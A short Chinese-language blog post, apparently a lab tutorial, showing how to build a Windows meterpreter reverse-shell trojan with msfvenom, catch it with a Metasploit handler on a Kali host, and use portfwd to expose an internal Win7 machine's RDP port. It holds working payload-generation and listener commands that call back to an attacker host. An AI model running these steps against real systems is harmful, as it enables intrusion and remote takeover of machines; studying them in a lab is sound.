前面我們已經學習了ssh端口轉發、防火牆端口轉發、rinetd端口轉發、nc端口轉發、socat端口轉發、portmap端口轉發,今天我們來學習portfwd端口轉發,portfwd 是meterpreter 中的一個功能,那麼本次實驗就先來制造一個小馬,然後基于meterpreter的portfwd,實作遠端端口轉發,通路跳闆機kali的1111端口,就能通路内網win7的3389端口,這也叫3389端口反彈~
ailx10
網絡安全優秀回答者
網絡安全碩士
去咨詢
實驗環境:
- macos:192.168.199.206
- kali:192.168.199.247
- win7:192.168.199.185
1、生成一個小馬
msfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=5555 LHOST=192.168.199.247 -f exe > hack.exe
2、通過metasploit監聽5555端口
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 5555
3、找個windows虛拟機,運作小馬
exploit -j -z
sessions
4、進入sessions,然後使用portfwd進行端口轉發
portfwd add -l 1111 -r 127.0.0.1 -p 3389
5、通路kali的1111端口,就是通路win7的3389端口
網絡安全任重道遠,洗洗睡吧~
釋出于 2022-07-23 23:27